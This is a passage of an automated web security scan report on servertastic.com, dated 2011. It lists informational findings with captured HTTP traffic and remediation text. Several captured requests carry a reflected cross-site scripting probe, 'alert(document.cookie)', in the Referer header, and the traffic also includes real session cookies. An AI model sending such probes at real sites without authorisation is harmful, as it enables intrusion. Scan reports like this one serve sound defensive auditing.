Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9406
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=454iYf414628; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OEODFPFDADHFBAHHMGBPHKDH; path=/
Date: Tue, 15 Mar 2011 01:27:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...
<td align="right"><script type="text/javascript" src="https://trustseal.verisign.com/getseal?host_name=www.servertastic.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

4.3. https://www.servertastic.com/smartertools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /smartertools/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /smartertools/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12096
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=mpfrte414626; path=/
Date: Tue, 15 Mar 2011 01:27:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...
<td align="right"><script type="text/javascript" src="https://trustseal.verisign.com/getseal?host_name=www.servertastic.com&amp;size=L&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="//asset0.zendesk.com/external/zenbox/zenbox-2.0.js"></script>
...[SNIP]...

5. Cacheable HTTPS response  previous  next
There are 3 instances of this issue:

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:


5.1. https://www.servertastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Request

GET / HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13073
Content-Type: text/html
Expires: Tue, 15 Mar 2011 01:28:14 GMT
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

5.2. https://www.servertastic.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /contact/

Request

GET /contact/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9406
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=454iYf414628; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OEODFPFDADHFBAHHMGBPHKDH; path=/
Date: Tue, 15 Mar 2011 01:27:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

5.3. https://www.servertastic.com/smartertools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /smartertools/

Request

GET /smartertools/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12096
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=mpfrte414626; path=/
Date: Tue, 15 Mar 2011 01:27:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

6. HTML does not specify charset  previous
There are 3 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


6.1. https://www.servertastic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /

Request

GET / HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/?72164%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb2a495ea941=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473; servertastic=s=vc9xcq414650; ASPSESSIONIDQATCSBTR=EGODFPFDLIEFJNIEINFKIODD

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 13073
Content-Type: text/html
Expires: Tue, 15 Mar 2011 01:28:14 GMT
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=vc9xcq414650; path=/
Date: Tue, 15 Mar 2011 01:29:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

6.2. https://www.servertastic.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /contact/

Request

GET /contact/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: http://blog.servertastic.com/smartermail-8x-now-available
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9406
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=454iYf414628; path=/
Set-Cookie: ASPSESSIONIDQATCSBTR=OEODFPFDADHFBAHHMGBPHKDH; path=/
Date: Tue, 15 Mar 2011 01:27:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

6.3. https://www.servertastic.com/smartertools/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.servertastic.com
Path:   /smartertools/

Request

GET /smartertools/ HTTP/1.1
Host: www.servertastic.com
Connection: keep-alive
Referer: https://www.servertastic.com/contact/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-745375159-1300151749546; posterous_mp=%7B%22all%22%3A%20%7B%22user%22%3A%20%22%22%2C%22registered%22%3A%20%22false%22%2C%22browser%22%3A%20%22Chrome%22%7D%2C%22events%22%3A%20%7B%7D%2C%22funnels%22%3A%20%7B%7D%7D; servertastic=s=mpfrte414626; ASPSESSIONIDQATCSBTR=GEODFPFDIOOEPJKGMCHNEMHC; siteuidut=8f8d83c8d4cc4de9a64c4ec46aa8d473

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12096
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Server: ZINC
X-Powered-By: ASP.NET
Set-Cookie: servertastic=s=mpfrte414626; path=/
Date: Tue, 15 Mar 2011 01:27:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- CactuShop v6 license: AGUKSOLU-PD4788-001 -->
<!-- CactuShop .1999-2006
...[SNIP]...

Report generated by XSS.CX Research Blog at Thu Mar 17 06:48:17 CDT 2011.